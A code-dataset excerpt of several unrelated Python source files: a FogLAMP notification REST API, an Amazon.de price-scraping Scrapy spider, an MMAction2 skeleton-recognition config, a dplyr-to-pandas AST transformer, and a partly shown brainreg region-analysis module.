http://localhost:8081/foglamp/notification/type\n \"\"\"\n return web.json_response({'notification_type': NOTIFICATION_TYPE})\n\n\nasync def get_notification(request):\n \"\"\" GET an existing notification\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification/\n \"\"\"\n try:\n notif = request.match_info.get('notification_name', None)\n if notif is None:\n raise ValueError(\"Notification name is required.\")\n\n notification = {}\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n notification_config = await config_mgr._read_category_val(notif)\n if notification_config:\n rule_config = await config_mgr._read_category_val(\"rule{}\".format(notif))\n delivery_config = await config_mgr._read_category_val(\"delivery{}\".format(notif))\n notification = {\n \"name\": notification_config['name']['value'],\n \"description\": notification_config['description']['value'],\n \"rule\": notification_config['rule']['value'],\n \"ruleConfig\": rule_config,\n \"channel\": notification_config['channel']['value'],\n \"deliveryConfig\": delivery_config,\n \"notificationType\": notification_config['notification_type']['value'],\n \"enable\": notification_config['enable']['value'],\n }\n else:\n raise ValueError(\"The Notification: {} does not exist.\".format(notif))\n except ValueError as ex:\n raise web.HTTPBadRequest(reason=str(ex))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=ex)\n else:\n return web.json_response({'notification': notification})\n\n\nasync def get_notifications(request):\n \"\"\" GET list of notifications\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification\n \"\"\"\n try:\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n all_notifications = await config_mgr._read_all_child_category_names(\"Notifications\")\n notifications = []\n for notification in all_notifications:\n notification_config = await config_mgr._read_category_val(notification['child'])\n notification = {\n \"name\": notification_config['name']['value'],\n \"rule\": notification_config['rule']['value'],\n \"channel\": notification_config['channel']['value'],\n \"notificationType\": notification_config['notification_type']['value'],\n \"enable\": notification_config['enable']['value'],\n }\n notifications.append(notification)\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=ex)\n else:\n return web.json_response({'notifications': notifications})\n\n\nasync def post_notification(request):\n \"\"\"\n Create a new notification to run a specific plugin\n\n :Example:\n curl -X POST http://localhost:8081/foglamp/notification -d '{\"name\": \"Test Notification\", \"description\":\"Test Notification\", \"rule\": \"threshold\", \"channel\": \"email\", \"notification_type\": \"one shot\", \"enabled\": false}'\n curl -X POST http://localhost:8081/foglamp/notification -d '{\"name\": \"Test Notification\", \"description\":\"Test Notification\", \"rule\": \"threshold\", \"channel\": \"email\", \"notification_type\": \"one shot\", \"enabled\": false, \"rule_config\": {}, \"delivery_config\": {}}'\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n data = await request.json()\n if not isinstance(data, dict):\n raise ValueError('Data payload must be a valid JSON')\n\n name = data.get('name', None)\n description = data.get('description', None)\n rule = data.get('rule', None)\n channel = data.get('channel', None)\n notification_type = data.get('notification_type', None)\n enabled = data.get('enabled', None)\n rule_config = data.get('rule_config', {})\n delivery_config = data.get('delivery_config', {})\n\n if name is None or name.strip() == \"\":\n raise ValueError('Missing name property in payload.')\n if description is None:\n raise ValueError('Missing description property in payload.')\n if rule is None:\n raise ValueError('Missing rule property in payload.')\n if channel is None:\n raise ValueError('Missing channel property in payload.')\n if notification_type is None:\n raise ValueError('Missing notification_type property in payload.')\n\n if utils.check_reserved(name) is False:\n raise ValueError('Invalid name property in payload.')\n if utils.check_reserved(rule) is False:\n raise ValueError('Invalid rule property in payload.')\n if utils.check_reserved(channel) is False:\n raise ValueError('Invalid channel property in payload.')\n if notification_type not in NOTIFICATION_TYPE:\n raise ValueError('Invalid notification_type property in payload.')\n\n if enabled is not None:\n if enabled not in ['true', 'false', True, False]:\n raise ValueError('Only \"true\", \"false\", true, false are allowed for value of enabled.')\n is_enabled = \"true\" if ((type(enabled) is str and enabled.lower() in ['true']) or (\n (type(enabled) is bool and enabled is True))) else \"false\"\n\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n curr_config = await config_mgr.get_category_all_items(name)\n\n if curr_config is not None:\n raise ValueError(\"A Category with name {} already exists.\".format(name))\n\n try:\n # Get default config for rule and channel plugins\n url = '{}/plugin'.format(request.url)\n try:\n # When authentication is mandatory we need to pass token in request header\n auth_token = request.token\n except AttributeError:\n auth_token = None\n\n list_plugins = json.loads(await _hit_get_url(url, auth_token))\n r = list(filter(lambda rules: rules['name'] == rule, list_plugins['rules']))\n c = list(filter(lambda channels: channels['name'] == channel, list_plugins['delivery']))\n if len(r) == 0 or len(c) == 0: raise KeyError\n rule_plugin_config = r[0]['config']\n delivery_plugin_config = c[0]['config']\n except KeyError:\n raise ValueError(\"Invalid rule plugin {} and/or delivery plugin {} supplied.\".format(rule, channel))\n\n # Verify if rule_config contains valid keys\n if rule_config != {}:\n for k, v in rule_config.items():\n if k not in rule_plugin_config:\n raise ValueError(\"Invalid key {} in rule_config {} supplied for plugin {}.\".format(k, rule_config, rule))\n\n # Verify if delivery_config contains valid keys\n if delivery_config != {}:\n for k, v in delivery_config.items():\n if k not in delivery_plugin_config:\n raise ValueError(\n \"Invalid key {} in delivery_config {} supplied for plugin {}.\".format(k, delivery_config, channel))\n\n # First create templates for notification and rule, channel plugins\n post_url = 'http://{}:{}/notification/{}'.format(_address, _port, urllib.parse.quote(name))\n await _hit_post_url(post_url) # Create Notification template\n post_url = 'http://{}:{}/notification/{}/rule/{}'.format(_address, _port, urllib.parse.quote(name),\n urllib.parse.quote(rule))\n await _hit_post_url(post_url) # Create Notification rule template\n post_url = 'http://{}:{}/notification/{}/delivery/{}'.format(_address, _port, urllib.parse.quote(name),\n urllib.parse.quote(channel))\n await _hit_post_url(post_url) # Create Notification delivery template\n\n # Create configurations\n notification_config = {\n \"description\": description,\n \"rule\": rule,\n \"channel\": channel,\n \"notification_type\": notification_type,\n \"enable\": is_enabled,\n }\n await _update_configurations(config_mgr, name, notification_config, rule_config, delivery_config)\n\n audit = AuditLogger(storage)\n await audit.information('NTFAD', {\"name\": name})\n except ValueError as ex:\n raise web.HTTPBadRequest(reason=str(ex))\n except Exception as e:\n raise web.HTTPInternalServerError(reason=str(e))\n else:\n return web.json_response({'result': \"Notification {} created successfully\".format(name)})\n\n\nclass NotFoundError(Exception):\n pass\n\n\nasync def put_notification(request):\n \"\"\"\n Update an existing notification\n\n :Example:\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"description\":\"Test Notification modified\"}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"rule\": \"threshold\", \"channel\": \"email\"}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"notification_type\": \"one shot\", \"enabled\": false}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"enabled\": false}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"description\":\"Test Notification\", \"rule\": \"threshold\", \"channel\": \"email\", \"notification_type\": \"one shot\", \"enabled\": false, \"rule_config\": {}, \"delivery_config\": {}}'\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n notif = request.match_info.get('notification_name', None)\n if notif is None:\n raise ValueError(\"Notification name is required for updation.\")\n\n # TODO: Stop notification before update\n\n data = await request.json()\n if not isinstance(data, dict):\n raise ValueError('Data payload must be a valid JSON')\n\n description = data.get('description', None)\n rule = data.get('rule', None)\n channel = data.get('channel', None)\n notification_type = data.get('notification_type', None)\n enabled = data.get('enabled', None)\n rule_config = data.get('rule_config', {})\n delivery_config = data.get('delivery_config', {})\n\n if utils.check_reserved(notif) is False:\n raise ValueError('Invalid notification instance name.')\n if rule is not None and utils.check_reserved(rule) is False:\n raise ValueError('Invalid rule property in payload.')\n if channel is not None and utils.check_reserved(channel) is False:\n raise ValueError('Invalid channel property in payload.')\n if notification_type is not None and notification_type not in NOTIFICATION_TYPE:\n raise ValueError('Invalid notification_type property in payload.')\n\n if enabled is not None:\n if enabled not in ['true', 'false', True, False]:\n raise ValueError('Only \"true\", \"false\", true, false are allowed for value of enabled.')\n is_enabled = \"true\" if ((type(enabled) is str and enabled.lower() in ['true']) or (\n (type(enabled) is bool and enabled is True))) else \"false\"\n\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n\n current_config = await config_mgr._read_category_val(notif)\n\n if current_config is None:\n raise NotFoundError('No {} notification instance found'.format(notif))\n\n rule_changed = True if rule is not None and rule != current_config['rule']['value'] else False\n channel_changed = True if channel is not None and channel != current_config['channel']['value'] else False\n\n try:\n # Get default config for rule and channel plugins\n url = str(request.url)\n url_parts = url.split(\"/foglamp/notification\")\n url = '{}/foglamp/notification/plugin'.format(url_parts[0])\n try:\n # When authentication is mandatory we need to pass token in request header\n auth_token = request.token\n except AttributeError:\n auth_token = None\n\n list_plugins = json.loads(await _hit_get_url(url, auth_token))\n search_rule = rule if rule_changed else current_config['rule']['value']\n r = list(filter(lambda rules: rules['name'] == search_rule, list_plugins['rules']))\n if len(r) == 0:\n raise KeyError\n rule_plugin_config = r[0]['config']\n\n search_channel = channel if channel_changed else current_config['channel']['value']\n c = list(filter(lambda channels: channels['name'] == search_channel, list_plugins['delivery']))\n if len(c) == 0:\n raise KeyError\n delivery_plugin_config = c[0]['config']\n except KeyError:\n raise ValueError(\"Invalid rule plugin:{} and/or delivery plugin:{} supplied.\".format(rule, channel))\n\n # Verify if rule_config contains valid keys\n if rule_config != {}:\n for k, v in rule_config.items():\n if k not in rule_plugin_config:\n raise ValueError(\"Invalid key:{} in rule plugin:{}\".format(k, rule_plugin_config))\n\n # Verify if delivery_config contains valid keys\n if delivery_config != {}:\n for k, v in delivery_config.items():\n if k not in delivery_plugin_config:\n raise ValueError(\n \"Invalid key:{} in delivery plugin:{}\".format(k, delivery_plugin_config))\n\n if rule_changed: # A new rule has been supplied\n category_desc = rule_plugin_config['plugin']['description']\n category_name = \"rule{}\".format(notif)\n await config_mgr.create_category(category_name=category_name,\n category_description=category_desc,\n category_value=rule_plugin_config,\n keep_original_items=False)\n if channel_changed: # A new delivery has been supplied\n category_desc = delivery_plugin_config['plugin']['description']\n category_name = \"delivery{}\".format(notif)\n await config_mgr.create_category(category_name=category_name,\n category_description=category_desc,\n category_value=delivery_plugin_config,\n keep_original_items=False)\n notification_config = {}\n if description is not None:\n notification_config.update({\"description\": description})\n if rule is not None:\n notification_config.update({\"rule\": rule})\n if channel is not None:\n notification_config.update({\"channel\": channel})\n if notification_type is not None:\n notification_config.update({\"notification_type\": notification_type})\n if enabled is not None:\n notification_config.update({\"enable\": is_enabled})\n await _update_configurations(config_mgr, notif, notification_config, rule_config, delivery_config)\n except ValueError as e:\n raise web.HTTPBadRequest(reason=str(e))\n except NotFoundError as e:\n raise web.HTTPNotFound(reason=str(e))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=str(ex))\n else:\n # TODO: Start notification after update\n return web.json_response({'result': \"Notification {} updated successfully\".format(notif)})\n\n\nasync def delete_notification(request):\n \"\"\" Delete an existing notification\n\n :Example:\n curl -X DELETE http://localhost:8081/foglamp/notification/\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n notif = request.match_info.get('notification_name', None)\n if notif is None:\n raise ValueError(\"Notification name is required for deletion.\")\n\n # Stop & remove notification\n url = 'http://{}:{}/notification/{}'.format(_address, _port, urllib.parse.quote(notif))\n\n notification = json.loads(await _hit_delete_url(url))\n\n # Removes the child categories for the rule and delivery plugins, Removes the category for the notification itself\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n\n await config_mgr.delete_category_and_children_recursively(notif)\n\n audit = AuditLogger(storage)\n await audit.information('NTFDL', {\"name\": notif})\n except ValueError as ex:\n raise web.HTTPBadRequest(reason=str(ex))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=str(ex))\n else:\n return web.json_response({'result': 'Notification {} deleted successfully.'.format(notif)})\n\n\nasync def _hit_get_url(get_url, token=None):\n headers = {\"Authorization\": token} if token else None\n try:\n async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:\n async with session.get(get_url, headers=headers) as resp:\n status_code = resp.status\n jdoc = await resp.text()\n if status_code not in range(200, 209):\n _logger.error(\"Error code: %d, reason: %s, details: %s, url: %s\", resp.status, resp.reason, jdoc,\n get_url)\n raise StorageServerError(code=resp.status, reason=resp.reason, error=jdoc)\n except Exception:\n raise\n else:\n return jdoc\n\n\nasync def _hit_post_url(post_url, data=None):\n try:\n async with aiohttp.ClientSession() as session:\n async with session.post(post_url, data=data) as resp:\n status_code = resp.status\n jdoc = await resp.text()\n if status_code not in range(200, 209):\n _logger.error(\"Error code: %d, reason: %s, details: %s, url: %s\", resp.status, resp.reason, jdoc,\n post_url)\n raise StorageServerError(code=resp.status, reason=resp.reason, error=jdoc)\n except Exception:\n raise\n else:\n return jdoc\n\n\nasync def _update_configurations(config_mgr, name, notification_config, rule_config, delivery_config):\n try:\n # Update main notification\n if notification_config != {}:\n await config_mgr.update_configuration_item_bulk(name, notification_config)\n # Replace rule configuration\n if rule_config != {}:\n category_name = \"rule{}\".format(name)\n await config_mgr.update_configuration_item_bulk(category_name, rule_config)\n # Replace delivery configuration\n if delivery_config != {}:\n category_name = \"delivery{}\".format(name)\n await config_mgr.update_configuration_item_bulk(category_name, delivery_config)\n except Exception as ex:\n _logger.exception(\"Failed to update notification configuration. %s\", str(ex))\n raise web.HTTPInternalServerError(reason='Failed to update notification configuration. {}'.format(ex))\n\n\nasync def _hit_delete_url(delete_url, data=None):\n try:\n async with aiohttp.ClientSession() as session:\n async with session.delete(delete_url, data=data) as resp:\n status_code = resp.status\n jdoc = await resp.text()\n if status_code not in range(200, 209):\n _logger.error(\"Error code: %d, reason: %s, details: %s, url: %s\",\n resp.status,\n resp.reason,\n jdoc,\n delete_url)\n raise StorageServerError(code=resp.status,\n reason=resp.reason,\n error=jdoc)\n except Exception:\n raise\n else:\n return jdoc\n\n"} {"ext": "py", "sha": "1a2ff9760b7949b5260393f7e1f6e78efb49f42a", "content": "import csv\nimport os\nimport copy\nimport re\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.http.cookies import CookieJar\n\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass AmazonSpider(BaseSpider):\n name = 'bosch-german-diy-amazon.de'\n allowed_domains = ['amazon.de']\n user_agent = 'spd'\n\n def start_requests(self):\n with open(os.path.join(HERE, 'bosch_german_diy.csv')) as f:\n reader = csv.DictReader(f)\n for row in reader:\n url = row['amazon']\n if url:\n yield Request(url, meta={'sku': row['sku']}, callback=self.parse_product)\n\n def parse(self, response):\n pass\n\n def parse_product(self, response):\n\n hxs = HtmlXPathSelector(response)\n\n loader = ProductLoader(item=Product(), selector=hxs)\n loader.add_value('url', response.url)\n loader.add_xpath('name', u'//div[@class=\"buying\"]/h1[@class=\"parseasinTitle\"]/span[@id=\"btAsinTitle\"]/text()')\n price = hxs.select(u'//div[@class=\"buying\"]/table[@class=\"product\"]//b[@class=\"priceLarge\"]/text()').extract()[0]\n loader.add_value('price', price.replace(',', '.'))\n loader.add_value('sku', response.meta['sku'])\n yield loader.load_item()\n"} {"ext": "py", "sha": "1a2ff98e6dbfbe12703bc881c2266d7e41cc44ee", "content": "# dataset settings\nann_type = 'bast_eval' # * change accordingly\nnum_classes = 9 if ann_type == 'bast_base' else 42\n\n# model settings\nmodel = dict(\n type='Recognizer3D',\n backbone=dict(\n type='ResNet3dSlowOnly',\n depth=50,\n pretrained=None,\n in_channels=17,\n base_channels=32,\n num_stages=3,\n out_indices=(2, ),\n stage_blocks=(4, 6, 3),\n conv1_stride_s=1,\n pool1_stride_s=1,\n inflate=(0, 1, 1),\n spatial_strides=(2, 2, 2),\n temporal_strides=(1, 1, 2),\n dilations=(1, 1, 1)),\n cls_head=dict(\n type='I3DHead',\n in_channels=512,\n num_classes=num_classes,\n spatial_type='avg',\n dropout_ratio=0.5),\n train_cfg=dict(),\n test_cfg=dict(average_clips='prob'))\n\n# dataset settings\ndataset_type = 'PoseDataset'\nann_file_train = f'data/skeleton/{ann_type}/bast_train.pkl'\nann_file_val = f'data/skeleton/{ann_type}/bast_val.pkl'\nann_file_test = f'data/skeleton/{ann_type}/bast_test.pkl'\nleft_kp = [1, 3, 5, 7, 9, 11, 13, 15]\nright_kp = [2, 4, 6, 8, 10, 12, 14, 16]\n\ntrain_pipeline = [\n dict(type='UniformSampleFrames', clip_len=54),\n dict(type='PoseDecode'),\n dict(type='PoseCompact', hw_ratio=1., allow_imgpad=True),\n dict(type='Resize', scale=(-1, 64)),\n dict(type='RandomResizedCrop', area_range=(0.56, 1.0)),\n dict(type='Resize', scale=(56, 56), keep_ratio=False),\n dict(type='Flip', flip_ratio=0.5, left_kp=left_kp, right_kp=right_kp),\n dict(\n type='GeneratePoseTarget',\n sigma=0.6,\n use_score=True,\n with_kp=True,\n with_limb=False),\n dict(type='FormatShape', input_format='NCTHW'),\n dict(type='Collect', keys=['imgs', 'label'], meta_keys=[]),\n dict(type='ToTensor', keys=['imgs', 'label'])\n]\nval_pipeline = [\n dict(type='UniformSampleFrames', clip_len=54, num_clips=1, test_mode=True),\n dict(type='PoseDecode'),\n dict(type='PoseCompact', hw_ratio=1., allow_imgpad=True),\n dict(type='Resize', scale=(-1, 64)),\n dict(type='CenterCrop', crop_size=64),\n dict(\n type='GeneratePoseTarget',\n sigma=0.6,\n use_score=True,\n with_kp=True,\n with_limb=False),\n dict(type='FormatShape', input_format='NCTHW'),\n dict(type='Collect', keys=['imgs', 'label'], meta_keys=[]),\n dict(type='ToTensor', keys=['imgs'])\n]\ntest_pipeline = [\n dict(\n type='UniformSampleFrames', clip_len=54, num_clips=10, test_mode=True),\n dict(type='PoseDecode'),\n dict(type='PoseCompact', hw_ratio=1., allow_imgpad=True),\n dict(type='Resize', scale=(-1, 64)),\n dict(type='CenterCrop', crop_size=64),\n dict(\n type='GeneratePoseTarget',\n sigma=0.6,\n use_score=True,\n with_kp=True,\n with_limb=False,\n double=True,\n left_kp=left_kp,\n right_kp=right_kp),\n dict(type='FormatShape', input_format='NCTHW'),\n dict(type='Collect', keys=['imgs', 'label'], meta_keys=[]),\n dict(type='ToTensor', keys=['imgs'])\n]\ndata = dict(\n videos_per_gpu=6,\n workers_per_gpu=1,\n test_dataloader=dict(videos_per_gpu=1),\n train=dict(\n type=dataset_type,\n ann_file=ann_file_train,\n data_prefix='',\n pipeline=train_pipeline),\n val=dict(\n type=dataset_type,\n ann_file=ann_file_val,\n data_prefix='',\n pipeline=val_pipeline),\n test=dict(\n type=dataset_type,\n ann_file=ann_file_test,\n data_prefix='',\n pipeline=test_pipeline))\n\n# optimizer\noptimizer = dict(\n type='SGD', lr=0.0094, momentum=0.9,\n weight_decay=0.0003) # this lr is used for 8 gpus\noptimizer_config = dict(grad_clip=dict(max_norm=40, norm_type=2))\n\n# learning policy\nlr_config = dict(policy='CosineAnnealing', by_epoch=False, min_lr=0)\ntotal_epochs = 280\ncheckpoint_config = dict(interval=10)\nworkflow = [('train', 10)]\nevaluation = dict(\n interval=5,\n metrics=['top_k_accuracy', 'mean_class_accuracy'],\n topk=(1, 2, 3, 4, 5))\neval_config = dict(\n metric_options=dict(\n top_k_accuracy=dict(topk=(1, 2, 3, 4, 5))),)\nlog_config = dict(\n interval=20, hooks=[\n dict(type='TextLoggerHook'),\n ])\n\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = ('https://download.openmmlab.com/mmaction/skeleton/posec3d/'\n 'slowonly_kinetics400_pretrained_r50_u48_120e_hmdb51_split1_keypoint/'\n 'slowonly_kinetics400_pretrained_r50_u48_120e_hmdb51_split1_keypoint-76ffdd8b.pth')\nresume_from = None\nfind_unused_parameters = False\n"} {"ext": "py", "sha": "1a2ffa3affc0e93e2021cfca989b2e8c5e1909ae", "content": "from lark import Transformer, v_args, Token\nfrom synthesis.synthesizer.dplyr_to_pd.code_analysis.nodes import *\nfrom abc import ABC, abstractmethod\n\n\nclass DplyrTransformer(Transformer):\n \"\"\" Lark built in visitor for grammar construction rules \"\"\"\n\n @v_args(inline=True)\n def identifier_node(self, arg):\n return IdentifierNode(arg)\n\n @v_args(inline=True)\n def single_block_node(self, arg):\n nodes = [arg]\n return BlockNode(nodes)\n\n @v_args(inline=True)\n def block_node(self, arg, other_bock: BlockNode):\n nodes = [arg] + other_bock.lines\n return BlockNode(nodes)\n\n @v_args(inline=True)\n def single_sequence_node(self, arg):\n nodes = [arg]\n return SequenceNode(nodes)\n\n @v_args(inline=True)\n def sequence_node(self, arg, other_seq: SequenceNode):\n nodes = [arg] + other_seq.arguments\n return SequenceNode(nodes)\n\n @v_args(inline=True)\n def function_node(self, name: Token, args: SequenceNode):\n return FunctionNode(str(name), args)\n\n @v_args(inline=True)\n def collapse_function_node(self, arg: Tree, fn: FunctionNode):\n return FunctionNode(str(fn.name), self.sequence_node(arg, fn.arguments))\n\n @v_args(inline=True)\n def predicate_node(self, arg: Token, op: Token, expr: Node, lc: Token, rest: Node):\n visitor = RWriter()\n args = [str(arg), str(op), expr.accept(visitor), str(lc), rest.accept(visitor)]\n return PredicateNode(' '.join(args))\n\n @v_args(inline=True)\n def single_predicate_node(self, arg: Token, op: Token, expr: Node):\n visitor = RWriter()\n args = [str(arg), str(op), expr.accept(visitor)]\n return PredicateNode(' '.join(args))\n\n @v_args(inline=True)\n def empty_node(self):\n return EmptyNode()\n\n @v_args(inline=True)\n def assignment_node(self, lvalue: IdentifierNode, expr: Node):\n return AssignmentNode(lvalue, expr)\n\n @v_args(inline=True)\n def rvalue_node(self, lvalue: IdentifierNode):\n return RValueNode(lvalue)\n\n @v_args(inline=True)\n def literal_node(self, lit: Token):\n return LiteralNode(lit)\n\n @v_args(inline=True)\n def collapse(self, arg):\n return arg\n\n\nclass Visitor(ABC):\n \"\"\"Generic visitor used to the traverse the AST\"\"\"\n\n @abstractmethod\n def visit_block_node(self, sq: BlockNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_function_node(self, fn: FunctionNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_identifier_node(self, ide: IdentifierNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_sequence_node(self, sq: SequenceNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_predicate_node(self, pr: PredicateNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_empty_node(self, pr: EmptyNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_assignment_node(self, an: AssignmentNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_right_value_node(self, rv: RValueNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_literal_node(self, rv: LiteralNode):\n raise NotImplementedError\n\n\nclass RWriter(Visitor):\n \"\"\"Visitor used to write R\"\"\"\n\n def visit_block_node(self, sq: BlockNode):\n args = []\n for arg in sq.lines:\n args += [arg.accept(self)]\n return '\\n'.join(args)\n\n def visit_function_node(self, fn: FunctionNode):\n return f'{fn.name}({fn.arguments.accept(self)})'\n\n def visit_identifier_node(self, ide: IdentifierNode):\n return ide.name\n\n def visit_sequence_node(self, sq: SequenceNode):\n args = []\n for arg in sq.arguments:\n args += [arg.accept(self)]\n return ', '.join(args)\n\n def visit_predicate_node(self, pr: PredicateNode):\n return pr.predicate\n\n def visit_empty_node(self, pr: EmptyNode):\n return ''\n\n def visit_assignment_node(self, an: AssignmentNode):\n return f'{an.left_value.accept(self)} <- {an.right_value.accept(self)}'\n\n def visit_right_value_node(self, rv: RValueNode):\n return rv.value.accept(self)\n\n def visit_literal_node(self, lit: LiteralNode):\n return lit.value\n\n\nclass DependencyFinder(Visitor):\n \"\"\" For each line find its depedencies on inputs\"\"\"\"\"\n\n def __init__(self, n_inputs: int):\n self.count = 0\n self.left_values = {IdentifierNode(f'input{i+1}'): IdentifierNode(f'input{i+1}') for i in range(n_inputs)}\n self.fn_dependencies = {}\n self.new_assignments = {}\n\n def visit_block_node(self, sq: BlockNode):\n for line in sq.lines:\n line.accept(self)\n return self.fn_dependencies\n\n def visit_function_node(self, fn: FunctionNode):\n result = fn.arguments.accept(self)\n return result\n\n def visit_identifier_node(self, ide: IdentifierNode):\n dep = next(filter(lambda x: x == ide, self.left_values), None)\n if dep is not None:\n return [self.left_values[dep]]\n return []\n\n def visit_sequence_node(self, sq: SequenceNode):\n dependencies = []\n for i in range(len(sq.arguments)):\n if isinstance(sq.arguments[i], FunctionNode) and sq.arguments[i] not in self.new_assignments:\n if sq.arguments[i].accept(self):\n new_id = IdentifierNode(f'tmp_{self.count}')\n an = AssignmentNode(new_id, sq.arguments[i])\n self.count += 1\n self.left_values[an.left_value] = an\n self.new_assignments[sq.children[i]] = new_id\n self.fn_dependencies[an] = an.right_value.accept(self)\n sq.replace_arg(i, new_id)\n dependencies += sq.arguments[i].accept(self)\n return dependencies\n\n def visit_predicate_node(self, pr: PredicateNode):\n return []\n\n def visit_empty_node(self, pr: EmptyNode):\n return []\n\n def visit_assignment_node(self, an: AssignmentNode):\n self.left_values[an.left_value] = an\n self.fn_dependencies[an] = an.right_value.accept(self)\n\n def visit_right_value_node(self, rv: RValueNode):\n return rv.value.accept(self)\n\n def visit_literal_node(self, lit: LiteralNode):\n return []\n"} {"ext": "py", "sha": "1a2ffa6ea157d8f454156833627a835f6464f06e", "content": "import numpy as np\nimport pandas as pd\n\n\nfrom napari.qt.threading import thread_worker\nfrom skimage.measure import regionprops_table\n\nfrom imlib.pandas.misc import initialise_df\nfrom imlib.general.list import unique_elements_lists\n\nfrom brainreg_segment.atlas.utils import lateralise_atlas_image\n\n\n@thread_worker\ndef region_analysis(\n label_layers,\n atlas_layer_image,\n atlas,\n regions_directory,\n output_csv_file=None,\n volumes=True,\n summarise=True,\n):\n regions_directory.mkdir(parents=True, exist_ok=True)\n if volumes:\n print(\"Calculating region volume distribution\")\n print(f\"Saving summary volumes to: {regions_directory}\")\n for label_layer in label_layers:\n analyse_region_brain_areas(\n label_layer,\n atlas_layer_image,\n regions_directory,\n atlas,\n )\n if summarise:\n if output_csv_file is not None:\n print(\"Summarising regions\")\n summarise_brain_regions(\n label_layers, output_csv_file, atlas.resolution\n )\n\n print(\"Finished!\\n\")\n\n\ndef summarise_brain_regions(label_layers, filename, atlas_resolution):\n summaries = []\n for label_layer in label_layers:\n summaries.append(summarise_single_brain_region(label_layer))\n\n result = pd.concat(summaries)\n # TODO: use atlas.space to make these more intuitive\n volume_header = \"volume_mm3\"\n length_columns = [\n \"axis_0_min_um\",\n \"axis_1_min_um\",\n \"axis_2_min_um\",\n \"axis_0_max_um\",\n \"axis_1_max_um\",\n \"axis_2_max_um\",\n \"axis_0_center_um\",\n \"axis_1_center_um\",\n \"axis_2_center_um\",\n ]\n\n result.columns = [\"region\"] + [volume_header] + length_columns\n\n voxel_volume_in_mm = np.prod(atlas_resolution) / (1000 ** 3)\n\n result[volume_header] = result[volume_header] * voxel_volume_in_mm\n\n for header in length_columns:\n for dim, idx in enumerate(atlas_resolution):\n if header.startswith(f\"axis_{idx}\"):\n scale = float(dim)\n assert scale > 0\n result[header] = result[header] * scale\n\n result.to_csv(filename, index=False)\n\n\ndef summarise_single_brain_region(\n label_layer,\n ignore_empty=True,\n properties_to_fetch=[\n \"area\",\n \"bbox\",\n \"centroid\",\n ],\n):\n data = label_layer.data\n if ignore_empty:\n if data.sum() == 0:\n return\n\n regions_table = regionprops_table(data, properties=properties_to_fetch)\n df = pd.DataFrame.from_dict(regions_table)\n df.insert(0, \"Region\", label_layer.name)\n return df\n\n\ndef analyse_region_brain_areas(\n label_layer,\n atlas_layer_data,\n destination_directory,\n atlas,\n extension=\".csv\",\n ignore_empty=True,\n):\n \"\"\"\n\n :param label_layer: napari labels layer (with segmented regions)\n\n :param ignore_empty: If True, don't analyse empty regions\n \"\"\"\n\n data = label_layer.data\n if ignore_empty:\n if data.sum() == 0:\n return\n\n name = label_layer.name\n\n masked_annotations = data.astype(bool) * atlas_layer_data\n\n annotations_left, annotations_right = lateralise_atlas_image(\n masked_annotations,\n atlas.hemispheres,\n left_hemisphere_value=atlas.left_hemisphere_value,\n right_hemisphere_value=atlas.right_hemisphere_value,\n )\n\n unique_vals_left, counts_left = np.unique(\n annotations_left, return_counts=True\n )\n unique_vals_right, counts_right = np.unique(\n annotations_right, return_counts=True\n )\n voxel_volume_in_mm = np.prod(atlas.resolution) / (1000 ** 3)\n\n df = initialise_df(\n \"structure_name\",\n \"left_volume_mm3\",\n \"left_percentage_of_total\",\n \"right_volume_mm3\",\n \"right_percentage_of_total\",\n \"total_volume_mm3\",\n \"percentage_of_total\",\n )\n\n sampled_structures = unique_elements_lists(\n list(unique_vals_left) + list(unique_vals_right)\n )\n total_volume_region = get_total_volume_regions(\n unique_vals_left, unique_vals_right, counts_left, counts_right\n )\n\n for atlas_value in sampled_structures:\n if atlas_value != 0:\n try:\n df = add_structure_volume_to_df(\n df,\n atlas_value,\n atlas.structures,\n unique_vals_left,\n unique_vals_right,\n counts_left,\n counts_right,\n voxel_volume_in_mm,\n total_volume_voxels=total_volume_region,\n )\n\n except 